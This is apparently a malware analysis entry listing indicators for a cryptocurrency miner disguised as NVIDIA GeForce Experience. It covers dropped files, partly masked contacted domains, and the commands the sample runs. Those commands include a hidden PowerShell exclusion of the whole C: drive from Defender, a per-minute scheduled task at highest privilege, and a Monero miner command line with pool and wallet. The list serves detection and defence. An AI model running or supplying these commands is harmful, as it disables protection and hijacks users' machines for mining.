Technical Information
- <SYSTEM32>\tasks\geforce experience
- <SYSTEM32>\svchost.exe
- %ALLUSERSPROFILE%\nvidia\nvidia.exe
- 'ht##bin.org':80
- 'di##ord.com':443
- http://ht##bin.org/ip
- 'di##ord.com':443
- DNS ASK ht##bin.org
- DNS ASK di##ord.com
- '%ALLUSERSPROFILE%\nvidia\nvidia.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\' (with hidden window)
- '<SYSTEM32>\svchost.exe' --donate-level 0 --max-cpu-usage 75 -o xmr.2miners.com:2222 -u 4AqHT2Azdn995DwtjYFAVeb348o9caxHjaLdmTjti2e9R59wALpgkun451k4PDiZSNSjoBJSybhe8AAhbQ3zAHnUJvAa4uN.darbinynks' (with hidden window)
- '%ALLUSERSPROFILE%\nvidia\nvidia.exe' ' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn "Geforce Experience" /rl HIGHEST /tr %ALLUSERSPROFILE%\Nvidia\nvidia.exe
- '<SYSTEM32>\svchost.exe' --donate-level 0 --max-cpu-usage 75 -o xmr.2miners.com:2222 -u 4AqHT2Azdn995DwtjYFAVeb348o9caxHjaLdmTjti2e9R59wALpgkun451k4PDiZSNSjoBJSybhe8AAhbQ3zAHnUJvAa4uN.darbinynks
- '<SYSTEM32>\taskeng.exe' {3835FA8E-67A7-4BC7-9817-CD6CD33DBA87} S-1-5-21-1960123792-2022915161-3775307078-1001:hlavvezs\user:Interactive:[1]